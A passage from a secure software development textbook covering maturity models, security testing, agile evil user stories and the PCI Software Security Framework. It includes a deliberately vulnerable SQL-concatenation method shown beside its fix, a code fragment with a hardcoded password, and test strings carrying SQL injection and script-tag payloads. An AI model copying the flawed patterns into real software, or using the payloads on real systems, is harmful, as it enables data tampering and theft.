    password = "Pass123phrase";
    count = form.quantity;
    total = count * product.cost();
    Message m = new Message(name, password, product, total);
    m.myEncrypt();
    server.send(m);
}

References

1. Perlroth N (2020) This is how they tell me the world ends, p 303
2. Zivanic S, Ruvceski S, Basicevic I (2022) Network security education: SQL injection attacks. 2022 IEEE Zooming Innovation in Consumer Technologies Conference (ZINC), IEEE, pp 77–80
3. 2011 CWE/SANS top 25: monster mitigations. http://cwe.mitre.org/19/mitigations.html. Accessed 15 Nov 2014
4. Mitre (2022) CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Mitre Corporation, 13 Oct 2022. https://cwe.mitre.org/data/definitions/78.html
5. OWASP (2017) OWASP Top 10 – 2017: the ten most critical web application security risks


6. Abazi B, Hajrizi E (2022) Practical analysis on the algorithm of the cross-site scripting attacks. The 29th international conference on systems, signals, and image processing, IEEE, June 1–3 2022, pp 1–4
7. Wang T, Zhao D, Qi J (2022) Research on cross-site scripting vulnerability of XSS based on international student website. 2022 international conference on computer network, electronic and automation (ICCNEA), IEEE, pp 154–158
8. Mitre (2022) CWE-352: Cross-Site Request Forgery (CSRF). 13 Oct 2022, Mitre Corporation. https://cwe.mitre.org/data/definitions/352.html
9. BSIMM (2020) Building security in maturity model, version 11, Sept 2020
10. Bryant E, Early J, Gopalakrishna R, Roth G, Spafford EH, Watson K, Williams P, Yost S (2003) Poly2 paradigm: a secure network service architecture. Proc. 19th annual computer security applications conference (ACSAC 2003), IEEE, 10p
11. Conklin WA, Shoemaker D (2014) CSSLP® certification all-in-one exam guide. McGraw-Hill Education, New York, NY
12. Dukes L, Yuan X, Akowuah F (2013) A case study on web application security testing with tools and manual testing. In: Proceedings of IEEE Southeastcon, IEEE, pp 1–6
13. Divyansh (2022) How to avoid integer overflows and underflows in C++? GeeksforGeeks, 4 July 2022. https://www.geeksforgeeks.org/how-to-avoid-integer-overflows-and-underflows-in-cpp/
14. Kulkarni D, Tripathi A (2010) A framework for programming robust context-aware applications. IEEE Trans Softw Eng 36(2):184–197
15. Open Group. COE security software requirements specification (SSRS) technical standard, Doc. Number C035
16. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, Nov 2013. www.pcisecuritystandards.org
17. SAFECode (2011) Fundamental practices for secure software development, 2nd edn. Software Assurance Forum for Excellence in Code, 8 Feb 2011. www.safecode.org, pp 1–56
18. Smith RE (2012) A contemporary look at Saltzer and Schroeder's 1975 design principles. IEEE Security & Privacy, Nov/Dec 2012
19. Simpson S (ed) (2011) Fundamental practices for secure software development, 2nd edn. SAFECode, 8 Feb 2011. http://www.safecode.org/publication/SAFECode_Dev_Practices0211.pdf. Accessed 15 Nov 2014

Chapter 22

Defining a Secure Software Process

Zatko soon learned “it was impossible to protect the production environment. All engineers had access. There was no logging of who went into the environment or what they did.... Nobody knew where data lived or whether it was critical, and all engineers had some form of critical access to the production environment.” Twitter also lacked the ability to hold workers accountable for information security lapses because it has little control or visibility into employees’ individual work computers, Zatko claims, citing internal cybersecurity reports estimating that 4 in 10 devices do not meet basic security standards. – [1, P 14] Baker vs. Twitter (Lawsuit) Complaint, Case 2:22-cv-06525 Document 1 Filed 09/13/22

Many organizations take the view that features are the most important delivery; with limited time and resources, features become the focus, and security is added in at the end. The problem with this approach is that deployment may occur with few or no security features, leaving the software defenseless (or nearly so) against attackers; data breaches are the inevitable result. Consider instead an organization where designers and developers know standard security practices, because they were trained in security before their projects began. Security requirements are decided based on risk analysis and regulatory compliance, ensuring that high-priority risks are mitigated and included in the schedule. Secure designs ensure that the architecture is effective and efficient. When code is written, secure utilities are familiar to the coders and correctly used the first time. Knowledgeable testers perform competent penetration testing and use automated test tools for faster, more accurate testing. The code may still be released before all bugs are fixed, but the organization knows and approves of any security flaws that remain. While this chapter reviews secure lifecycles in general, the next chapter (Chap. 23) delves into requirements and design issues in more detail.

A Secure Software Initiative is the organizational goal to improve security within the software development life cycle. This section discusses best practices when implementing a secure software initiative in an organization. First, we introduce secure software maturity models, then describe some secure software processes for agile and testing activities, and finally introduce the PCI Software Security Framework.


The BSIMM and PCI DSS standards were developed cooperatively by a conglomerate of over 100 software organizations, including large corporations. (This section describes the BSIMM maturity model generally to mid-level 2, not the highest level 3.) Regardless of whether an organization develops PCI-certified code, it is still useful to consider a process meant to protect sensitive payment card data. After all, many companies process sensitive data. Should we treat payment card data more securely than health care data, social security numbers, passport numbers, or bank account numbers? Thus, the final section of this chapter provides an abbreviated overview of this well-defined and more rigorous standard [2].

22.1 Important Concepts

Maturity models outline how organizations achieve secure software through measured steps. First, we introduce two maturity models, SAMM and BSIMM, and then present BSIMM's high-level recommendations for addressing security in an organization.

22.1.1 Software Security Maturity Models

Software security maturity models provide a mechanism for organizations to improve their secure software process. They are helpful in that they provide a progressive ladder of activities that can only be achieved in steps over time. Groups that develop standards for secure development include the Building Security In Maturity Model (BSIMM; www.bsimm.com) and OWASP's Software Assurance Maturity Model (SAMM). The BSIMM software security framework includes four domains of three practices each, giving 12 total practices, as displayed in Table 22.1 [4]. The SAMM model is very similar, but follows software development stages [5]. Both BSIMM and SAMM define their maturity models with three levels (BSIMM: Emerging, Maturing and Optimizing), plus a potential base level 0, where practices are not performed. Each maturity level defines a set of activities for each practice. This chapter emphasizes BSIMM, since it appears to be maintained more regularly. These maturity levels enable an organization to assess and advance its maturity, by selecting those activities it would like to improve. BSIMM recommends that an organization choose its own path in improving security, setting goals for the areas that are the most important to improve, prioritized by the organization [4]. Therefore, it is uncommon for an organization to be fully at a specific level.


Table 22.1  Practices of BSIMM (version 11) versus SAMM (version 2)

Building Security In Maturity Model (BSIMM):
• Governance: Strategy & metrics; Compliance & policy; Training
• Intelligence: Attack models; Security features & design; Standards & requirements
• Secure software development life cycle touchpoints: Architectural analysis; Code review; Security testing
• Deployment: Penetration testing; Software environment; Configuration mgmt. & vulnerability mgmt.

OWASP Software Assurance Maturity Model (SAMM):
• Governance: Strategy & metrics; Policy & compliance; Education & guidance
• Design: Threat assessment; Security requirements; Secure architecture
• Implementation: Secure build; Secure deployment; Defect management
• Verification: Architecture assessment; Requirements-driven testing; Security testing
• Operations: Incident mgmt.; Environment mgmt.; Operational mgmt.

22.1.2 The Secure Software Group

Software organizations have to coordinate two entities: governance, which is responsible for laying out policies, monitoring compliance, documenting risk, and communicating management direction; and engineering, which is concerned with agile, lean processes using automation to achieve rapid feature delivery as part of Development-Operations (DevOps) [4]. The goals of engineering are driven by rapid delivery, error avoidance, and software resiliency, and its methods are driven by the cloud's automated continuous integration/continuous delivery (CI/CD), using third-party software and containers to attain feature velocity. Through CI/CD tools (including GitHub, GitLab and OpenShift), security research, vulnerabilities and remediations can be shared with external organizations. With these competing goals, software security can be forgotten amid aggressive schedules and changes in environment (including changes in personnel and third-party software). To achieve stability, it is crucial that a champion for secure software exists in executive management, to educate top management, define policy, lead and prioritize secure software, communicate issues and monitor progress via metrics [4].


The Building Security In Maturity Model (BSIMM) recommends that a senior manager lead a specialized Secure Software Group that interfaces with the other software development groups. Through this executive and his/her group, the two competing goals of governance and engineering can be resolved, in particular through risk management. The Secure Software Group (SSG) is generally a centralized group that leads security efforts, monitors projects and ensures developer training for security [4]. This technical group also often writes security-related software, evaluates third-party software, and participates in design and code reviews. From a legal perspective, they may work with lawyers in identifying regulatory requirements, establishing service level agreements and contractual obligations, evaluating PII requirements, preparing a data classification system, tracking controls for compliance, and instituting thresholds for releasing code. Within the regular software groups, BSIMM recommends 'satellite' security champions, who can represent security interests locally to each project. To communicate with satellite staff and projects, the SSG should develop a security portal listing security standards, indicate which open source software is appropriate, and establish a standards review board [4].

22.2 Secure Development Life Cycle

Chapter 21 discussed specific issues related to vulnerabilities and coding. Our next chapter, Chap. 23, describes methods for requirements and design. This chapter, and this section specifically, provides guidelines for the secure software development process in general, including testing to ensure security. These tools and techniques become a tool chest from which you can choose to best fit your application and organizational needs. Consider that each development stage has input criteria, a process, and output/deliverable criteria. If the deliverable of each stage has been verified to be of good quality, then defects will not snowball into later stages and there will be less rework after release. This saves project time, improves product quality, and prevents nasty security problems after release. Mature organizations should train all their software engineers in secure development and should have a secure software standard. For those interested in becoming certified, two certifications to choose from include:

• CSSLP: ISC2's Certified Secure Software Lifecycle Professional, with knowledge areas in Secure Software Concepts, Software Requirements, Software Design, Software Implementation/Coding, Software Testing, Software Acceptance, Software Deployment, Operations, Maintenance and Disposal, and Supply Chain and Software Acquisition. Further information is available at: https://www.isc2.org/csslpdomains.
• ITIL (IT Infrastructure Library): This more general certification includes knowledge units in Basics, Service Strategy, Service Design, Service Transition, Service Operation, and Continual Service Improvement. Find more at http://itilexam.net.


22.2.1 Coding

At its most basic maturity level, BSIMM recommends software reviews led by the Secure Software Group, including security feature reviews and design reviews for high-risk applications [4]. It likewise recommends automated code review tools (e.g., static analysis) as well as manual reviews of high-risk code [4]. All projects should go through code reviews. To ensure that proper reviews occur, tool mentors can be assigned to guide developers through automated reviews, and centralized reporting can verify that reviews occurred.
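As a hedged illustration (the class and query below are invented for this sketch, not drawn from any particular tool's ruleset), consider the kind of finding a static analyzer reports: SQL built by string concatenation, which enables SQL injection (see Chap. 21), and the parameterized alternative that resolves it.

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class AccountLookup {

    // FLAWED: a static analyzer would flag this method, because untrusted
    // input flows directly into the SQL command (CWE-89, SQL injection).
    ResultSet findFlawed(Connection db, String userName) throws SQLException {
        Statement stmt = db.createStatement();
        return stmt.executeQuery(
            "SELECT * FROM accounts WHERE owner = '" + userName + "'");
    }

    // FIXED: a parameterized query keeps the user input as data, so it
    // can never be interpreted as additional SQL commands.
    ResultSet findSafe(Connection db, String userName) throws SQLException {
        PreparedStatement stmt = db.prepareStatement(
            "SELECT * FROM accounts WHERE owner = ?");
        stmt.setString(1, userName);
        return stmt.executeQuery();
    }
}

Static analyzers catch the first pattern reliably because the taint from userName flows directly into the query string; the parameterized form removes the flaw rather than masking it.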

22.2.2 Testing

The purpose of the Test Stage is to verify that the code fulfills the requirements and to validate that the code works as expected. The first step before testing occurs is to determine the attack surface [8]. A minimum standard of acceptance (Bug Bar) is determined and used in developing test plans. Testing plans and results should be documented as part of quality assurance.

Segregation of Duties (or Separation of Duties) recommends that those who formally test products are not the developers; thus a quality control (QC) or quality assurance (QA) group should instead be responsible for testing [4]. This is recommended since developers have a primary goal of getting their code to work, while quality assurance has a primary goal of finding bugs. BSIMM recommends that QA drive security feature tests, through the use of black box testing, automated testing, boundary-value or edge testing, and fuzz testing specific to the application.

Automated testing is cheap to perform and is being performed by crackers; it is better to know the results first! Automated tools include vulnerability and penetration tests, for example for web security in testing SQL injection. The difference between a vulnerability test and a penetration test is that vulnerability tests look for improper configurations and attackable vulnerabilities, while penetration tests actually break into the system. Other dynamic tools include fuzz testing, robustness testing, and vulnerability scanners. In some cases, test code may need to be developed, since available tools may not adequately test your configuration. Vulnerability scanners can test for web and other attacks, such as integer, float or string overflows, SQL injection and cross-site scripting [6]. In addition, insecure configuration options can cause problems, such as autocomplete enabled for forms. Fuzz and robustness testing generate a large number of inputs or interactions that can find subtle flaws that may be missed by static analysis, such as environmental problems. Fuzz testing generates random input to test handling of exceptions and incorrect input [8].
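As a minimal sketch of the fuzzing idea (the parse method below is a hypothetical stand-in for whatever routine is under test), random inputs are generated in a loop, cleanly rejected input counts as correct behavior, and any other exception is reported as a robustness bug.

import java.util.Random;

public class MiniFuzzer {

    // Hypothetical stand-in for the routine under test: rejects records
    // that do not start with a 2-byte magic number.
    static void parse(byte[] record) {
        if (record.length < 2 || record[0] != 0x4D || record[1] != 0x5A)
            throw new IllegalArgumentException("malformed record");
        // ... further parsing of the body would go here ...
    }

    public static void main(String[] args) {
        Random rand = new Random(42);        // fixed seed: failures reproduce
        for (int trial = 0; trial < 100_000; trial++) {
            byte[] input = new byte[rand.nextInt(1024)];
            rand.nextBytes(input);           // random content, random length
            try {
                parse(input);
            } catch (IllegalArgumentException expected) {
                // cleanly rejecting bad input is correct behavior
            } catch (RuntimeException crash) {
                // anything else (index errors, null pointers) is a robustness bug
                System.err.println("Fuzz failure on trial " + trial + ": " + crash);
            }
        }
        System.out.println("Fuzzing complete");
    }
}

A fixed seed keeps failures reproducible; production fuzzers add coverage guidance and input mutation, but the acceptance criterion is the same: unexpected crashes are defects.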

Websites require special testing for web-type attacks; even PCI DSS mandates testing for specific attacks [23]. Special testing tools are available for websites. Web spiders are automated tools that parse website(s) to find embedded links [6]. The web spider follows all links recursively to determine and display the full connectivity of a website. This is useful in fighting cross-site scripting, where websites unknowingly become infected with unexpected links.

Reliability testing ensures that the software can survive unusual conditions, such as errors or unusual operating conditions. Some software failures can impact human life: it is important to determine the failure rate, particularly of mission-critical functions, which shall not fail. Some tools (e.g., Holodeck) can simulate faults to debug error handling [14]. Some tools perform load testing, with a load of simultaneous users, to evaluate performance and bottlenecks (e.g., LoadRunner). It is also helpful to run the program under low memory conditions or insufficient privileges, and to break a connection before a transaction is completed [8]. Software may slow down, but should not crash or generate incorrect results.

Third-party code is a quick route to finished features, but can be risky. It is recommended to select only highly trusted third-party code and to inspect and vet it well [12]. Code shall be minimized to include only the required features and should be well tested. Higher maturity levels of BSIMM [4] recommend evaluating such code within a jail or sandbox, which quarantines an untrusted program as it runs, and monitoring it with protocol analyzers to ensure that (for example) only strong encryption algorithms are used.

Manual tests can be tailored for the specific application according to the threat model. Manual penetration testing is essential, and requires knowledgeable penetration testers [8]. Tools that can help in manual testing include proxies and vulnerability scanners, which allow dynamic packet creation. A proxy intercepts commands and responses between the browser and the server, enabling the user to view and modify a packet before transmission [6]. BSIMM also recommends that both internal and external penetration testing be performed, and that penetration testing occur periodically [4]. Penetration testers should be provided information about the application, and discovered security flaws should be tracked in the change control system. Free tools which support many web-testing features include Paros and OWASP's Zed Attack Proxy (ZAP); both support automated and dynamic manual testing [6]. Commercial products include the Fortify and Acunetix web vulnerability scanners. Fortify supports static analysis and automated vulnerability scanning of traditional web and mobile interfaces, while Acunetix's feature set includes HTTP, SOAP, AJAX and Flash content.

At the end of the testing process, the software may be certified [15]. A Bug Bar is a security threshold for release, ensuring that software is not released with high-risk security defects. The threshold is preferably defined at the requirements stage, and software is not released until the defined security threshold is achieved. Microsoft uses the Bug Bar standard to evaluate the effects of security defects, which it considers the most important and reliable attribute in measuring a security fault. The Bug Bar defines defect levels for each threat category as high, moderate or low. A simplified sample for the Tampering and Repudiation threat categories, related to servers, is shown in Table 22.2 [16].


Table 22.2  Bug bar example for tampering/repudiation

Severity: High – Permanent modification of any user data in a common scenario that persists after restarting the OS/application.
Severity: Moderate – Permanent modification of any user data in a specific scenario, or temporary modification of user data in a common scenario.
Severity: Low – Temporary modification of data in a specific scenario that does not persist after restarting the OS/application.

Following an evaluation, governments and larger organizations may require a certification and accreditation (C&A) process to approve the product for general deployment and use. A product may be certified after evaluation by an independent (non-development) group, which ensures all required standards have been met. After a product is certified, an accreditation authority may then approve the product for production and use. Accreditation is an administrative process to ensure that complete products, including all IT and non-IT parts, operate properly in their full operational environment [17]. Such accreditation ensures that the supply chain for a secure product is vetted.

22.2.3 Deployment, Operations, Maintenance and Disposal

Configuration Management ensures a stable development and release process. Quality assurance or quality control tests software built via a formal release process, using configuration management. Software that is released to production should be built the same way, independent of the development environment; this process adheres to segregation of duties. During software release and deployment, care shall be taken that the software is properly configured, patched and monitored [15].

BSIMM requires that not only must an application be secured, but its network and host computer must also be optimized for security [4]. Highly secure server applications can be placed in their own application containers or physical or virtual machines, and implementations should address basic cloud security, as appropriate. Deployment configurations shall be fully defined and documented, and code should be protected to ensure integrity. The client and server applications must be hardened as described in the Information Security and Network Security chapters. The configuration must be locked down, with configuration, environment, and data files not accessible to the user (a startup check sketch appears at the end of this subsection). The developed software should be patched when needed, in addition to regularly patching the software that the application relies on, such as the operating system and database. Patched software should come with full documentation, including the reason(s) for the patch [2].

BSIMM recommends that while applications are actively deployed, attacks and logs need to be monitored, and discovered defects tracked for fixing by


development [4]. Plans for incident response and emergency response help to prepare for eventual software crises. During a crisis, it will be critical to access an inventory tracking which software is installed where. When the software product is retired, security considerations include archiving the data and program, sanitizing remaining media, and disposing of the software [15].
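Returning to the configuration lockdown point above, here is a hedged sketch (the file path is hypothetical, and the check assumes a POSIX file system) of an application that refuses to start when its configuration file is readable or writable by other users:

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;
import java.util.Set;

public class ConfigGuard {

    // Refuse to start if the configuration file is accessible to group or
    // others: a locked-down deployment owns its configuration exclusively.
    static void requireLockedDown(Path configFile) throws IOException {
        Set<PosixFilePermission> perms = Files.getPosixFilePermissions(configFile);
        if (perms.contains(PosixFilePermission.GROUP_WRITE)
                || perms.contains(PosixFilePermission.OTHERS_WRITE)
                || perms.contains(PosixFilePermission.OTHERS_READ)) {
            throw new SecurityException(
                "Refusing to run: " + configFile + " permissions too open: " + perms);
        }
    }

    public static void main(String[] args) throws IOException {
        requireLockedDown(Path.of("/etc/myapp/app.conf"));  // hypothetical path
        System.out.println("Configuration file is locked down; continuing startup.");
    }
}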

22.3 Secure Agile Development

Agile software development is wildly popular, and many translate agility to mean less time spent on documentation and less structure than traditional software engineering. However, secure software requires a secure process, attention to detail, documentation, and high quality. Here are some techniques to ensure security is integrated into an agile development environment [5, 20]:

1. Security training is even more important in this less structured environment. Define security roles.
2. Include Evil User Stories in every sprint, such as: "As a hacker, I can send bad data in HTTP forms, so I can access and modify the database in unauthorized ways."
3. Include risk analysis at the start of every sprint and whenever the product backlog changes.
4. Address Evil User Stories for every sprint feature/check-in, every sprint, every epic and every product release. Security features shall include authentication, access control, input validation, output encoding, error/exception handling, encryption, data integrity, logging and alarms, and data communication security for all applications.
5. Include some form of security-minded code review. This can happen with two pairs of eyes developing software together (i.e., pair programming) or via a group review of critical code.
6. Agile is also known for test-driven development, which writes the test before the code, then writes code to pass the test. More recently, automated testing using static and dynamic analysis saves time and raises quality; special methods include code analyzers and fuzz testing. Manual penetration testing is a great final step. (A test-driven sketch appears below.)
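As a hypothetical sketch of item 6 (the InputSanitizer class and its method are invented here to illustrate the idea, not taken from a real library), a security-minded JUnit-style test can be written first to pin down the behavior that defeats the evil user story from item 2, followed by a first-pass implementation:

import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertTrue;

// Test written BEFORE the code exists (test-driven development).
class InputSanitizerTest {

    @Test
    void rejectsSqlInjectionAttempts() {
        assertFalse(InputSanitizer.isSafeFormField("'; DROP TABLE students; --"));
        assertFalse(InputSanitizer.isSafeFormField("x' OR '1'='1"));
    }

    @Test
    void rejectsScriptTags() {
        assertFalse(InputSanitizer.isSafeFormField("<script>alert(1)</script>"));
    }

    @Test
    void acceptsOrdinaryInput() {
        assertTrue(InputSanitizer.isSafeFormField("Maria Smith-Jones"));
    }
}

// A first-pass implementation written to make the tests pass (hypothetical
// logic; parameterized queries and output encoding remain the primary defenses).
class InputSanitizer {
    static boolean isSafeFormField(String value) {
        return value != null && !value.matches(".*(['<>;]|--).*");
    }
}

Writing the test first forces the security behavior to be specified before coding begins; the implementation can then be refined while the tests guard against regressions.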

22.3.1 Designing Agile Style: Evil User Stories

The format of an Evil User Story is: "As an <evil user>, I <do some wrongdoing>, resulting in <issue>." Examples of Evil User Stories are shown in Table 22.3, where example evil users, wrongdoings and issues can be mixed and matched to create a large set of potential issues, which then must be prioritized.


Table 22.3  Sample mix and match evil user stories

Evil user: Lazy employee; Incompetent employee; Evil employee; Criminal; Evil customer; Thoughtless customer; Foreign nation-state; Evil hacker; Hacktivist
Wrongdoing: Forget to…; Incorrectly…; Steal…; Change…; Impersonate…; Mistakenly…; Implant…; Replay…; Break…
Resulting issue: Lost/incorrect…; Deny…; Sell…; Change record…; Obtain (service or info); Lost…; Destroy…; Demonstrate…; Embarrass…

Table 22.4  Sample mix and match security stories

Role: Nurse; Manager; Security staff; System admin; Database; Software system; Programmer; Tester; Manager
Action: Request documentation on…; Monitor…; Establish permissions…; Monitor…; Enforce…; Check…; Validate…; Test…; Document info…
Condition: Prevent social engineering; Detect fraud/collusion; Prevent incorrect X; Detect…; Prevent inappropriate use of…; Enforce Y regulation; Prevent and log…; Correct Z mistakes; Enforce W policy

Once risks have been defined, vulnerabilities must be mitigated. The design of those defenses can be documented using Security Stories. Security Stories have the format: "As a <role>, I do <action> to ensure <condition>." Sample roles, actions and conditions are listed in Table 22.4, which again can be mixed and matched. Table 22.5 shows some actual examples of Evil User Stories and Security Stories for Einstein University. An appropriate agile style also includes test cases to confirm proper implementation of the security stories. Depending on the complexity and sensitivity of the application, these secure agile techniques may be partially combined with requirements documentation techniques as specified in Chap. 23.

22.4 Example Secure Process: PCI Software Security Framework

Perhaps one of the best ways to learn how to build secure software is to examine a successful and mature security standard for secure software. Here we evaluate the Payment Card Industry (PCI) Software Security Framework (SSF) [2].

Table 22.5  Evil user stories for Einstein University

1. Evil user story: As a failing student, I use a password dictionary to break into a professor's grades to change my grade.
   Corresponding security story: As a system administrator, I require passwords to be 12 characters long and lock out accounts after 6 invalid attempts, to prevent password guessing.
   Test case: Case 1: Test learning management system (LMS) login system

2. Evil user story: As a budding script kiddie, I try different hacking tools on university websites for fun.
   Corresponding security story: As a system administrator at the university, I monitor illegal accesses, note their IP addresses, find offending students and charge them.
   Test case: Case 2: Test LMS attack logs

3. Evil user story: As a criminal cyber-hacker, I try to break into student accounts to learn their social security and credit card numbers.
   Corresponding security story: As a network administrator, I partition the confidential zone within the firewall and monitor for specific, legal protocols to prevent exfiltration of data.
   Test cases: Case 3: Test firewall configuration; Case 4: Test registration login system

4. Evil user story: As a professor with a grant, I am too busy to be careful that the money I spend is according to my grant contract.
   Corresponding security story: As a financial officer in charge of grants, I review grant expenses to ensure they are in line with the approved grant.
   Test case: Case 5: Test grant budget vs. expense report

The SSF is a standard to certify software and/or devices that transmit payment card information. While most companies avoid the certification process by using pre-built, certified third-party software to perform this single function (and developing the wrapper and remaining code independently), legally the software vendor is ultimately responsible for the security of their software product, regardless of the third-party software they use. Responsibility for security must be clearly divided between the software vendor/builder and any third-party software provider within contracts, so the use of PCI-certified code for payment card transactions helps to alleviate concerns. The software vendor is responsible for ensuring the contract clearly assigns security responsibilities to each party (including code reviews, testing, hosting, and installation) and also for periodically ensuring that those responsibilities are met.

The PCI Software Security Framework is used to certify software to handle payment card transactions. Two standards include Secure Software Lifecycle Requirements and Assessment Procedures [2], which describes requirements for the secure software development process, and Secure Software Requirements and Assessment Procedures, which describes feature requirements. This section provides an overview of the first document [2]. An overview of the second document is discussed in the next chapter, covering design details.

The first area of concern for PCI is security governance, with two objectives: allocating security responsibility, and defining software policy and strategy. Responsibility for secure software must be assigned by senior management to someone who has sufficient authority to enforce security policy and who reports back periodically with metrics relating to security goals and strategy. Policy ensures that an inventory of security standards and regulations is maintained at least annually.


The organization shall also adopt a secure industry-standard process (e.g., BSIMM, ISO/IEC 27034, or OpenSAMM) to build security in throughout the software lifecycle. This process establishes checkpoints to ensure security requirements are met, potentially by using agile 'stories', change management, code reviews, testing, and/or release criteria. These processes (or checkpoints) are then tracked through performance measurement, with the goal of quantifying and reducing vulnerability to security attacks. Developers maintain updated security training specific to the jobs they perform (e.g., design, coding, or testing) and perform their assigned security responsibilities accordingly.

PCI's second focus area is threat and vulnerability identification. The first part of a risk assessment is for developers to classify critical assets for confidentiality, integrity and availability. Second, software threats shall be evaluated using frameworks, such as SANS or MITRE, or other sources, including industry risk, internal assessments, and/or academic papers. Part of the risk assessment must include an evaluation of third-party or open-source code for vulnerabilities. Decisions on whether and how threats and vulnerabilities are mitigated shall be justified, documented, and approved at appropriate levels. Means to assure security controls are effective may include risk management documentation, feature lists, rigorous testing, monitoring of live systems, and/or a bug bounty program. PCI-mentioned security features, potentially useful for feature lists, include multi-factor authentication, logging and input validation. Security testing is performed throughout the lifecycle, including after software release, and includes testing of third-party software. Tests are explicitly defined, including required configurations. An inventory of tests includes documentation describing when and which tests were run, testing results, and identified vulnerabilities. When vulnerabilities are found, they are rated (with justification) for severity and criticality, and fixed before release, unless justified through an exception process. Defects shall be fixed and patched in a timely manner in released and production software.

PCI's third concern is secure data management, which includes change management, and data and integrity protections. Configuration management tracks all defects and changes to code, including documenting the security impact of a feature, what changes were required, who made the changes, and who authorized the release. Configuration management also includes a version control feature, which tracks the files in each release. Configuration management protects software against unauthorized changes by tracking all code check-out and check-in processes. Managing changes to software helps to secure intellectual property, ensure fixes carry through to new releases, and manage third-party software. Integrity checks, digitally signed certificates and periodic configuration management audits are useful to detect unauthorized changes to software (a minimal integrity-check sketch appears at the end of this section). Specific elements of payment card information are processed, stored, transmitted and handled in a minimal way, according to documented business need. Restricted access control privileges and strong encryption protect access during processing; thereafter any traces of the data are deleted and rendered irretrievable. Production data must always be protected, and shall not be accessible for debugging, testing, or troubleshooting.


There is a clear process and inventory for tracking and approving the use of sensitive production data.

PCI's fourth area of concern is secure communications, including evaluating third-party software, guiding software delivery to stakeholders, and maintaining commercial software. The software developer/vendor or service provider must provide sufficient information to their customers/stakeholders to ensure that the system is securely installed, configured and managed. During installation, the proper libraries must be installed, including encryption and random number generators. During configuration/operation, customers must be able to create/delete accounts, change passwords and permissions, and enable/disable services or features. Vendor documentation must include detailed, secure installation and operation instructions, and document each configuration and security-related option. The documentation must be reviewed and updated annually or when changes occur, and updates must be communicated to customers.

Communication between software vendors and customers shall be two-way: vendors or service providers must maintain and support their software, and work with customers or installers to properly operate the software. Vendors must issue patches for vulnerabilities in a timely manner, with notifications and directions for installation. The notifications shall include a description of the changes and the areas of impact, so that customers can make informed decisions about when to implement the fix. If a fix is not yet available, any security workarounds should be explained through such notifications. In addition, software vendors shall provide an email address for external communications, such as reported bugs from the research community (or a bug bounty program).

The certification process itself is rigorous, and involves review of documentation, interviews and observations [2]. Required documentation during the certification audit includes threat and risk analysis, software architecture and design documentation, configuration and metadata information, testing results and defect data, source code, and policy documentation. For more details on this standard, see PCI's Software Security Framework: Secure Software Lifecycle: Requirements and Assessment Procedures [2].
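Returning to the integrity checks mentioned under secure data management, here is a minimal sketch (the artifact name and recorded digest are hypothetical; HexFormat requires Java 17+) of detecting unauthorized changes by recomputing a SHA-256 digest and comparing it to the value recorded at release time:

import java.nio.file.Files;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.util.HexFormat;

public class ReleaseIntegrityCheck {

    // Recomputes the SHA-256 digest of an artifact and compares it to the
    // digest recorded at release time; a mismatch signals tampering.
    static boolean matchesRecordedDigest(Path artifact, String expectedHex) throws Exception {
        MessageDigest sha256 = MessageDigest.getInstance("SHA-256");
        byte[] digest = sha256.digest(Files.readAllBytes(artifact));
        // Constant-time comparison avoids leaking how many bytes matched
        return MessageDigest.isEqual(digest, HexFormat.of().parseHex(expectedHex));
    }

    public static void main(String[] args) throws Exception {
        Path artifact = Path.of("payment-module-1.1.jar");    // hypothetical release file
        String recorded = "9f86d081884c7d659a2feaa0c55ad015" + // hypothetical recorded hash
                          "a3bf4f1b2b0b822cd15d6c15b0f00a08";
        System.out.println(matchesRecordedDigest(artifact, recorded)
                ? "Artifact intact" : "Artifact MODIFIED - do not deploy");
    }
}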

22.5 Security Industry Standard: Common Criteria

In addition to the payment card industry's PCI standard, other businesses, such as defense contractors, may also require software certification. These contracts may require that products operate according to security regulation or industry standards, such as those of the International Organization for Standardization (ISO), Common Criteria, the Payment Card Industry (PCI) Software Security Framework, or the American government standards body, the National Institute of Standards and Technology (NIST). NIST sources include a free series of documents for security implementation.


Standards have been developed to certify IT and/or security products. Common Criteria (CC) (www.commoncriteriaportal.org) developed a standard for product development and testing, with a rating system from one to seven [21]. Common Criteria has certified access control devices, biometric devices, databases, smart card systems, key management systems and more [22], and is now the international standard ISO/IEC 15408. ISO/IEC 15408, entitled Information security, cybersecurity and privacy protection – Evaluation criteria for IT security, is a comprehensive, world-respected standard. CC was developed as an international standard with a number of member countries. Some nations in Europe, for example, use CC to certify devices as privacy-compliant. CC replaces the Rainbow Series (including the Orange Book and Red Book) in American government contracts.

22.6 Questions and Problems

1. Vocabulary. Match each meaning with the correct word.

Bug bar, Sandbox, Jail, Reliability test, Static analysis, Accreditation, Security story, Segregation of duties, Fuzz test, Certification, Maturity model, Satellite, Version control, Evil user story, Secure Software Group, Configuration management, Penetration test

(a) An operating system imposes resource limits on a program, to limit I/O, disk and network resource consumption.
(b) A threshold level of security flaws is defined. Before release, software must meet this threshold.
(c) This tool develops random input to test handling of exceptions and incorrect input.
(d) This test technique ensures that software can survive unusual conditions, such as faults, errors, loading and low resources.
(e) A test for untrusted programs, which quarantines the software to observe actions.
(f) A technique used in agile development to describe an attack.
(g) A technique used in agile development to describe how to counter an attack.
(h) A method of measuring the sophistication level of the software development process for handling security issues.
(i) A department which leads security reviews and develops secure software and standards.
(j) A member of a development group with an interest or role in security guidance.
(k) This test uses inappropriate authorization to attempt to break into software.


(l) A system that tracks changes to software, including the security impact, what changes were required, who made the changes, and who authorized the release.
(m) A feature of configuration management that tracks the files in a particular software release.
(n) The development, test and production environments use separate software and test data library systems.

2. Evil User Stories: Input. For your selected case study industry, prepare five evil user stories that involve attacks on input. Also prepare their corresponding security stories.

3. Evil User Stories: Authentication. For your selected case study industry, prepare three evil user stories that involve attacks on authentication or access control. Then prepare corresponding security stories.

4. Secure Software Audit. For a PCI DSS incident response case involving a large breach, what documentation should an auditor look for to confirm that the software development does follow PCI Software Security Framework requirements, as described in this chapter?

5. Legal Decision. A manager swears in court that they do security planning as part of their agile-style development. However, there is no written policy and no existing design documents. There are automated tests, but no maintained test results. If you were the judge, would you find the organization negligent? Provide written arguments supporting your decision.

